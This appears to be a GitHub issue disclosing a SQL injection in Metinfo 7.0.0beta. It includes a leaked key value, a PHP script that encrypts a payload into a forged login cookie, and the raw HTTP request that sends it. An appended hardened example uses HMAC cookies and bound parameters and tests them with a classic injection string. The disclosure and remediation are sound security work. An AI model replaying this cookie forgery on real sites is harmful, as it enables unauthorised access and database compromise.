Metinfo7.0 SQL Injection #2

Open
SZFsir opened this issue Nov 7, 2019 · 0 comments
SZFsir commented Nov 7, 2019

Vulnerability Name: Metinfo7.0.0beta CMS SQL Injection
Product Homepage: https://www.metinfo.cn/
Software link: https://u.mituo.cn/api/metinfo/download/7.0.0beta
Version: V7.0.0

To demonstrate this vuln, follow the three steps below.

First, get the key

Metinfo discloses the key in /config/config_safe.php
[image]

Then, encrypt the payload

Metinfo7.0 uses an encrypted cookie to authenticate logins.
We can see it uses user input as auth and key and passes them to the login_by_auth function
[image]
In the login_by_auth function, it uses the getauth function to decode the auth data with the key we input.
[image]
And then login_by_password passes the username (the SQL injection payload), which causes the SQLi.
We have the key, and we know the way to encrypt data, as below:

```php
// authcode() is the Discuz!-style reversible cipher Metinfo uses for the cookie:
// an RC4-like keystream keyed from md5($key), with a 10-digit expiry and a
// 16-char md5 check value prepended to the plaintext before encryption.
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0){
    $ckey_length = 4;  
    $key = md5($key ? $key : UC_KEY);        // UC_KEY is only consulted when no key is passed
    $keya = md5(substr($key, 0, 16));        // keystream key material
    $keyb = md5(substr($key, 16, 16));       // key material for the check value
    // the first 4 chars of the ciphertext are a random salt mixed into the key
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    // DECODE: drop the salt and base64-decode; ENCODE: prepend expiry and check value
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    // key-scheduling pass over the S-box
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    // keystream generation, XORed byte by byte with the input
    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }

    if($operation == 'DECODE') {
        // accept only if not expired and the check value matches the plaintext
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
           return substr($result, 26);
        } else {
           return '';
        }
    }else{
        // salt followed by base64 ciphertext with '=' padding stripped
        return $keyc.str_replace('=', '', base64_encode($result));
    }
}

var_dump($argv[1]);
// key = value read from config_safe.php concatenated with the acc_key cookie value ('abcd')
echo urlencode(authcode($argv[1]."\t1234",'ENCODE','dxeOfyLMbaJiK7SBzT8UC3kiwRNOdKoY'.'abcd'));
```

[image]

Finally, send the payload

(You should encrypt the data first)

GET /metinfo/7.0beta/index.php HTTP/1.1
Host: 127.0.0.1:7000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh,en;q=0.5
Origin: http://127.0.0.1:7000
Connection: close
Cookie: acc_auth=747cs0xMOG3WQ%2BgyHeTJbp%2BF1SszYl9LAOw36gTFpMmAnePPnoQCr%2FLtzbnD8tOg1WdylIQ; acc_key=abcd;
Content-Length: 0

(execute the sql twice)
[image]
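A defender-side counterpart, added here as an example and not code from Metinfo or from the issue author: the two fixes the writeup implies are that the cookie key must come only from server configuration (never from a request value such as acc_key) and that the username recovered from the cookie must reach the database as a bound parameter. This example swaps the page's authcode scheme for an HMAC-SHA256 cookie and uses an in-memory SQLite table via PDO; the secret, the cookie layout (username, tab, expiry), the table admin_table and the function names are all hypothetical.

```php
<?php
// Added example (not Metinfo's code): hardened login-by-cookie flow.
// Assumptions (hypothetical): the secret lives only in server config, the cookie
// carries "username\t<expiry>" plus an HMAC, and pdo_sqlite is available.
declare(strict_types=1);

// Placeholder secret: load it from a config file that is not web-readable.
// It is never read from a request parameter such as acc_key.
const SERVER_AUTH_KEY = 'REPLACE-WITH-RANDOM-SERVER-SECRET';

// Issue a cookie: base64url(payload) . "." . hmac(payload). Key is fixed server-side.
function issue_auth_cookie(string $username, int $ttl, string $key = SERVER_AUTH_KEY): string {
    $payload = $username . "\t" . (time() + $ttl);
    $mac = hash_hmac('sha256', $payload, $key);
    return rtrim(strtr(base64_encode($payload), '+/', '-_'), '=') . '.' . $mac;
}

// Verify a cookie with the server key only; return the username or null.
function verify_auth_cookie(string $cookie, string $key = SERVER_AUTH_KEY): ?string {
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$b64, $mac] = $parts;
    $payload = base64_decode(strtr($b64, '-_', '+/'), true);
    if ($payload === false) {
        return null;
    }
    // Constant-time MAC comparison before anything in the payload is trusted.
    if (!hash_equals(hash_hmac('sha256', $payload, $key), $mac)) {
        return null;
    }
    $fields = explode("\t", $payload, 2);
    if (count($fields) !== 2 || !ctype_digit($fields[1]) || (int)$fields[1] < time()) {
        return null; // malformed or expired
    }
    return $fields[0];
}

// Demo database: an in-memory SQLite table standing in for the CMS admin table.
function demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE admin_table (id INTEGER PRIMARY KEY, admin_id TEXT UNIQUE)');
    $db->exec("INSERT INTO admin_table (admin_id) VALUES ('admin')");
    return $db;
}

// A username from a verified cookie is still untrusted data for SQL purposes,
// so it is bound as a parameter rather than concatenated into the query.
function login_by_auth_safe(PDO $db, string $cookie): ?array {
    $username = verify_auth_cookie($cookie);
    if ($username === null) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, admin_id FROM admin_table WHERE admin_id = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = demo_db();
// A cookie minted with the server key for an existing admin is accepted.
var_dump(login_by_auth_safe($db, issue_auth_cookie('admin', 3600)));
// A cookie minted under a client-chosen key fails the MAC check, because the
// server no longer lets the client name the key.
var_dump(login_by_auth_safe($db, issue_auth_cookie('admin', 3600, 'abcd')));
// A username containing SQL metacharacters only ever reaches the database as a
// bound parameter, so it simply matches no row.
var_dump(login_by_auth_safe($db, issue_auth_cookie("admin' OR '1'='1", 3600)));
```

The first call returns the admin row; the other two return null. The design point is that removing the client-supplied key closes the forgery path on its own, and parameterising the lookup removes the injection even if cookie integrity were ever broken again.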